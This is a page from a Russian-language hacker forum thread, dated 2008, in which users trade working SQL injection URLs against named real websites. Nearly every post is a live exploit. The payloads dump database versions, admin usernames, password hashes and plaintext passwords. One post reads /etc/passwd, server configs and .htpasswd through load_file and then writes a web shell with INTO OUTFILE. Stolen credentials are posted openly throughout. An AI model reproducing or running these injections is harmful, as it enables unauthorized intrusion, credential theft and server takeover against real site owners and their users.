ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7031  
Старый 07.12.2008, 20:25
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Thrasher88
Цитата:
http://smartlip.com/symbian/fileshare/flist.php?cat=-1%27+or+1=1--++1
тема для вопросов здесь http://forum.antichat.ru/threadedpost982014.html

Последний раз редактировалось sabe; 07.12.2008 в 20:48..
 
Ответить с цитированием

  #7032  
Старый 07.12.2008, 21:21
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.netsetup.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,userpass),5,6+from+auth_users--
логин/пасс:
Код:
harold:dfb5e2a33dc5372e6971b2dde90145ce
Код:
marc:3e3dcdc5cbb5196312d1e5def7b74806
Код:
peter:2547b2647e4860b41b570ce658e6e24b
Код:
erwin:cbd6326b959161bc0234e9c549f77034
--------------------------------------------------------
The End
Аварийное отключение компа=(((
Остальные скули выложу поже...
 
Ответить с цитированием

  #7033  
Старый 07.12.2008, 21:36
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://hemuspartners.com/ask.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32), version(),user(),database()),7,8,9,10,11,12,13,14--
5.0.67-community - stefanwo_partner@localhost - stefanwo_hemusprt

http://www.computerclinic.on.ca/ask.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard - rarmstrong_usr@localhost - rarmstrong_db

http://www.esqway165.com/faq.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard-log - esqwa206@localhost - esqwa206_phpbb1

http://ppcolonic.com/ask.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7--
5.0.41-community-log - ppcolonic_pspg@localhost - ppcolonic_db

Последний раз редактировалось masternet; 07.12.2008 в 22:08..
 
Ответить с цитированием

  #7034  
Старый 07.12.2008, 21:44
Аватар для Thrasher88
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

www.harlemstage.org
Цитата:
http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,user(),database(),version(),6--
Version: 5.0.67-log
User: harlem_5@209.68.4.232
Database: harlem_live

Последний раз редактировалось Thrasher88; 07.12.2008 в 22:02..
 
Ответить с цитированием

  #7035  
Старый 07.12.2008, 22:34
Аватар для d1aVOL
d1aVOL
Познающий
Регистрация: 29.07.2007
Сообщений: 49
Провел на форуме:
279583

Репутация: 7
По умолчанию

Цитата:
sql: http://www.southworth.com/page.php?id=-1+union+select+password+from+users--
вытащил:
kelly;meex
Maryann;Meeks

но...не подходит.
админка http://www.southworth.com/manage
 
Ответить с цитированием

  #7036  
Старый 07.12.2008, 22:51
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

Код:
http://www.thebiggreen.net/article.php?id=952+and+1=0+union+select+1,@@version,3,4,5,6,7,8,9,10,11--
Код:
http://www.mediatunisie.com/news-web-sites-tunis-tunisia.php?id=-6+union+select+1,version(),3,4/*
Код:
http://www.sitecom.com/reviews_view.php?review=Disk+ID+-+LN-117+Disk+ID+5+stars&reviewitem=null union all select 1,2,3,4,5,6,7,8,9,10--
Код:
http://www.e-maximfashion.com/news.php?news_id=-2%20union%20all%20select%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10%20from%20admin%20--
Цитата:
user: admin pass: emax2006
Цитата:
Админка- http://www.e-maximfashion.com/admin/
Код:
http://www.meshop.ws/detail.php?id=-2+union+select+1,2,3,concat(user,0x3e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--
 
Ответить с цитированием

  #7037  
Старый 07.12.2008, 23:10
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

d1aVOL
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,user,passw ord)))+from+mysql.user--
root
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/passwd%27)))+from+mysql.user+limit+0,1--
кавычки не фильтрует
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/httpd/conf/httpd.conf%27)))+from+mysql.user+limit+0,1--
узнаем пути и сайты на сервере )
Цитата:
<VirtualHost 72.3.131.57:80>
DocumentRoot /var/www/html
ServerName southworth.com
ServerAlias www.southworth.com ...
<Directory "/var/www/html">
allow from all
Options +Indexes
</Directory>
LogLevel emerg
CustomLog /var/log/httpd/sw_access_log combined
</VirtualHost>
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/bsinclude.inc%27)))+from+mysql.user+limit+0,1--
смотрим конфиг админки
Цитата:
$bshostname="localhost";
$bsusername="swdata";
$bspassword="dataB88";
$bsdatabase="southworthbs";
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/.htpasswd%27)))+from+mysql.user+limit+0,1--
ну и самое главное пароли к админке:
Цитата:
cservice:12gesqQWYvu66
sieraci:70X9knvrU05jc
southworth:WjEHl7rauDQhc
что за хеш?
Цитата:
http://www.southworth.com/page.php?id=-1+union+select+%27vital evil php%27+into+outfile+%27/var/www/html/images/main2/_notes/s.php%27--
ну и конешно залитие шелла ) токо папку на запись остается наити тебе )

усе успешного вам хека!

Последний раз редактировалось sabe; 08.12.2008 в 00:20..
 
Ответить с цитированием

  #7038  
Старый 08.12.2008, 02:25
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,version(),3,4,5,6%60

http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,unhex(hex(GROUP_CONCAT(user_ name,0x3A,password))),3,4,5,6+from+adm_users%60

Версия MySQL:
5.0.58
-------
Имя базы:
traveleurope
-------
Юзер:
fiere@192.168.1.170
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------
mysql user:
srv1
-------
mysql password:
6f14f6e867cffa2c

Последний раз редактировалось Pashkela; 08.12.2008 в 04:28..
 
Ответить с цитированием

  #7039  
Старый 08.12.2008, 12:34
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.liberte-economie.com/edit.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13--
5.0.51a-log - economie_base@localhost - economie
 
Ответить с цитированием

  #7040  
Старый 08.12.2008, 13:22
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

facebook.com

Код:
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4--
Version: 5.0.67-community
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ